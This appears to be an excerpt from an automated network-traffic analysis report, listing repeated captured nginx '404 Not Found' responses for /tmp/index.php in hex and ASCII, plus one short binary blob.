Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:50 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:12:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:03 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 63 42 f3 31 04 ed f1 49 f6 9d ed e4 21 9b 23 9a e8 31 55 12 c3 89 9b c2 63 9a 3b 0d 16 Data Ascii: #\6cB1I!#1Uc;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:14 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:17 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:20 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
